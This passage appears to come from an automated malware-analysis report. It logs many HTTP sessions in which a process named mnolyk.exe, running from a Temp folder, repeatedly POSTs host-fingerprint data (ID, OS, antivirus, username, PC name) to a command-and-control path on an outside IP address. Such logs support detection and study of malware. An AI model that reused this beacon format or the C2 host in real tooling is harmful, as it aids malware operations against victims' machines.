Feb 7, 2023 19:57:12.597369909 CET	155	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.2.5	49980	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:20.421307087 CET	489	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:20.485151052 CET	490	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.2.5	49981	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:20.676822901 CET	490	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:20.740328074 CET	491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.2.5	49982	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:20.917525053 CET	491	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:20.980205059 CET	492	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.2.5	49983	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:21.153208017 CET	492	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:21.219578981 CET	493	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.2.5	49984	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:21.387139082 CET	493	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:21.453010082 CET	494	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.2.5	49985	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:21.623964071 CET	494	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:21.688324928 CET	495	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.2.5	49986	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:21.857183933 CET	495	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:21.923472881 CET	496	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.2.5	49987	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:22.091331959 CET	496	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:22.156634092 CET	497	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.2.5	49988	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:22.324290037 CET	497	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:22.388648987 CET	498	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.2.5	49989	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:22.562861919 CET	498	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:22.627059937 CET	499	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49728	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:12.773087025 CET	156	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:12.836726904 CET	156	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.2.5	49990	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:22.962299109 CET	499	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:23.026417017 CET	500	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.2.5	49991	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:23.361807108 CET	500	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:23.428241968 CET	501	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.2.5	49992	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:23.691994905 CET	501	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:23.758259058 CET	502	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.2.5	49993	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:24.614336967 CET	502	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:24.679451942 CET	503	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.2.5	49994	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:24.905755997 CET	503	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:24.969290972 CET	504	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.2.5	49995	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:25.960796118 CET	504	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:26.028198957 CET	505	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.2.5	49996	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:26.579679012 CET	505	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:26.644428015 CET	506	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.2.5	49997	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:26.812665939 CET	506	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:26.876950026 CET	507	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.2.5	49998	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:27.044687033 CET	507	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:27.109872103 CET	508	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.2.5	49999	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:27.278095961 CET	508	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:27.341284990 CET	509	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49729	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
